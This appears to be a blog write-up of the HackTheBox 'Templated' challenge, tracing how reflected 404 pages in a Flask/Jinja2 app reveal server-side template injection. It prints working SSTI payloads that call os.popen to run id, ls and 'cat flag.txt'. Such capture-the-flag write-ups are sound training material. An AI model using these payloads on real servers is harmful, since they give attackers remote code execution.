Post

HackTheBox | Templated

Writeup of a easy-rated Web Exploitation Challenge from HackTheBox

Posted Updated
Preview Image
By Younes Tasra
2 min read
Templated is a Web Exploitation challenge from HackTheBox that revolves around exploiting a Server-Side Template Injection vulnerability in order to achieve remote code execution on the server and eventually get the flag

Challenge Name

Templated Challenge


Challenge Description

  • Can you exploit this simple mistake?

Write-Up

Enumeration:

Front page:

Navigating to the provided docker instance (144.126.206.23:32088), you will be presented with the following web page:

Front page
  • The website’s front page is pretty empty as it primarily consists of text without any interactive elements such as buttons, logos, or clickable features.
  • However, the front page reveals the framework and templating engine being used in the backend of this application, which is Flask/Jinja2

Source code:

The source code of the page doesn’t contain any hidden secrets, such as developer’s comments or hidden directories.

Source code

Server's response:

Taking a look at the server’s response, the Server HTTP header discloses the use of Werkzeug/1.0.1 and Python/3.9.0 is used in conjunction with Flask as the backend infrastructure.

Server Header

Werkzeug's console:

Werkzeug is a comprehensive WSGI (Web Server Gateway Interface) utility library for Python. It serves as a foundation for developing web applications, and is often used in conjunction with the web frameworks like Flask to handle the level-level aspects of web development.
Werkzeug provides a development server called Werkzeug's Debugger that includes an interactive console known as the interactive debugger console. This console allows developers to execute Python code and inspect variables during the debugging process.
Long story short, if debug mode is enabled, we can access the /console endpoint and easily gain RCE - Remote Code Execution on the server running the vulnerable web application.

Detecting the vulnerability:

Unfortunately, the debug mode is disabled on the server. However, navigating to /console does not return a 404 - NOT FOUND status-code, rather it returns a 200 FOUND, which means 404 pages are probably being templated.

Templated 404 pages
  • As you can see, the web application is reflecting the name of the directory or file we want to access, such as in this example console.
  • This might lead to an SSTI - Server-Side Template Injection vulnerabilities, if user input passed via the URL is not properly sanitized.

Exploitation:

Remote Code Execution:

Since we know that the server is using Flask, which is a Python library, and we can leverage the MRO - Method Resolution Order to traverse upwards in the request library within Flask. This allows us to import the os library.
Once we have access to the os library, we can execute OS commands on the server hosting the web application.

1

{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}


id command


Since we already know the templating engine in use, which is Jinja2, we can leverage Jinja2-specific expressions like the following:

1

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read()}}


id command
  • As you can see, this jinja2-specific expression uses the os module to execute the id command.

Flag:

Now that we have remote code execution on the server, we can execute the ls command to list the files and directories located in the current directory:

1

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('ls').read()}}


ls command
  • As you can see, there is text file named flag.txt

Let’s read the content of flag.txt file, by injecting the following payload:

1

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat flag.txt').read()}}


Flag
Challenges, HTB
Web Exploitation SSTI RCE Werkzeug Flask Jinja2
This post is licensed under CC BY 4.0 by the author.